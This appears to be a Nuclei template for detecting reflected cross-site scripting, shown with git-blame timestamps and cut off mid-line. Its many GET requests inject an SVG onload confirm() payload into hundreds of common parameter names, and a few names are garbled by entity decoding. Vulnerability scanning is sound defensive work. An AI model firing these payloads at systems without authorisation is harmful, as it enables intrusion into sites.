2021-01-09 13:02:04 +00:00
|
|
|
id: top-xss-params
|
2020-08-15 08:48:23 +00:00
|
|
|
|
|
|
|
info:
|
2022-09-23 17:53:08 +00:00
|
|
|
name: Top 38 Parameters - Cross-Site Scripting
|
2021-06-09 12:20:56 +00:00
|
|
|
author: foulenzer,geeknik
|
2022-09-23 17:53:08 +00:00
|
|
|
severity: high
|
|
|
|
description: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 7.2
|
|
|
|
cwe-id: CWE-79
|
2023-10-14 11:27:55 +00:00
|
|
|
metadata:
|
2024-02-06 21:04:15 +00:00
|
|
|
max-request: 29
|
2023-10-14 11:27:55 +00:00
|
|
|
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: xss,generic
|
2020-08-15 08:48:23 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2020-08-15 08:48:23 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2024-02-06 21:07:16 +00:00
|
|
|
- "{{BaseURL}}/?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E"
|
2024-02-11 21:18:12 +00:00
|
|
|
- "{{BaseURL}}/?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E"
|
2024-02-06 21:07:16 +00:00
|
|
|
- "{{BaseURL}}/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E"
|
2024-02-11 21:18:12 +00:00
|
|
|
- "{{BaseURL}}/?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E"
|
2024-02-06 21:07:16 +00:00
|
|
|
- "{{BaseURL}}/?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E"
|
|
|
|
- "{{BaseURL}}/?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27x